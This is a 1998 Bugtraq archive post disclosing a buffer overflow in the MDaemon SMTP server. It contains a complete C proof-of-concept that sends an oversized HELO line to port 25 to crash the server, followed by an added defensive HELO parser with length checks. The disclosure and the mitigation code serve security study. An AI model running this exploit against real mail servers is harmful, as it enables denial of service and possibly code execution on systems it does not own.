Bugtraq mailing list archives
MDaemon SMTP Server Buffer Overflow's
From: aleph1 () DFW NET (Aleph One)
Date: Wed, 11 Mar 1998 00:44:45 -0600
[ forwarded from rootshell ]

Since a similar bug was just released about the MDaemon Config Manager on
Bugtraq, we decided to release our MDaemon exploit early. After the exploit
you will find the original Bugtraq post. Note that MDaemon has known about
this bug since February.

Look for our upcoming paper on SMTP server security.

/*
 * MDaemon SMTP server for Windows buffer overflow exploit
 *
 * http://www.mdaemon.com - if you dare...
 *
 * Tested on MDaemon 2.71 SP1
 *
 * http://www.rootshell.com/
 *
 * Released 3/10/98
 *
 * (C) 1998 Rootshell All Rights Reserved
 *
 * For educational use only.  Distribute freely.
 *
 * Note: This exploit will also crash the Microsoft Exchange 5.0 SMTP mail
 * connector if SP2 has NOT been installed.
 *
 * Danger!
 *
 * A malicious user could use this bug to execute arbitrary code on the
 * remote system.
 *
 */

#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <strings.h>   /* bzero(), bcopy() */
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char *argv[])
{
  struct sockaddr_in sin;
  struct hostent *hp;
  char *buffer;
  int sock, i;

  if (argc != 2) {
    printf("usage: %s <smtp server>\n", argv[0]);
    exit(1);
  }
  hp = gethostbyname(argv[1]);
  if (hp==NULL) {
    printf("Unknown host: %s\n",argv[1]);
    exit(1);
  }
  bzero((char*) &sin, sizeof(sin));
  bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
  sin.sin_family = hp->h_addrtype;
  sin.sin_port = htons(25);
  sock = socket(AF_INET, SOCK_STREAM, 0);
  connect(sock,(struct sockaddr *) &sin, sizeof(sin));
  buffer = (char *)malloc(10000);
  /* Build "HELO " followed by 4096 'x' characters and CRLF */
  sprintf(buffer, "HELO ");
  for (i = 0; i<4096; i++)
    strcat(buffer, "x");
  strcat(buffer, "\r\n");
  write(sock, &buffer[0], strlen(buffer));
  close(sock);
  free(buffer);
  return 0;
}

-- cut here --

Rootshell Note: The config manager appears to run on port 8081 and is
configurable. In the version that we tested (2.71 SP1) this buffer overflow
did not exist in the remote config manager, and required a remote version of
3.7 and not 3.0.
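Added example, not part of the forwarded post and not MDaemon or Rootshell code: a server-side HELO handler that rejects the 4096-byte argument above by checking length before any copy. The function name and reply-code mapping are hypothetical; the 512-byte command line and 64-byte domain limits are the ones in RFC 821 section 4.5.3.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

#define SMTP_LINE_MAX   512  /* RFC 821 4.5.3: command line incl. CRLF */
#define SMTP_DOMAIN_MAX 64   /* RFC 821 4.5.3: domain name */

/* Hypothetical helper: validate one received command line of `len` bytes
 * (not necessarily NUL-terminated) and copy the HELO argument into `out`.
 * Returns an SMTP reply code: 250 accepted, 500 line too long or not a
 * well-formed HELO line, 501 bad argument. Writes at most out_sz bytes. */
int smtp_parse_helo(const char *line, size_t len, char *out, size_t out_sz)
{
    size_t i, n;

    if (out_sz == 0)
        return 501;
    out[0] = '\0';

    /* Reject on length first, before anything is copied. */
    if (len > SMTP_LINE_MAX)
        return 500;
    /* The line must be terminated by CRLF. */
    if (len < 2 || line[len - 2] != '\r' || line[len - 1] != '\n')
        return 500;
    len -= 2;

    /* Command word is case-insensitive and followed by one space. */
    if (len < 5 || line[4] != ' ')
        return 500;
    for (i = 0; i < 4; i++)
        if (toupper((unsigned char)line[i]) != "HELO"[i])
            return 500;
    line += 5;
    n = len - 5;

    /* Argument must fit the protocol limit and the caller's buffer. */
    if (n == 0 || n > SMTP_DOMAIN_MAX || n >= out_sz)
        return 501;
    for (i = 0; i < n; i++) {
        unsigned char c = (unsigned char)line[i];
        /* Letters, digits, '-', '.', and brackets for address literals. */
        if (!(isalnum(c) || c == '-' || c == '.' || c == '[' || c == ']'))
            return 501;
    }
    memcpy(out, line, n);
    out[n] = '\0';
    return 250;
}
```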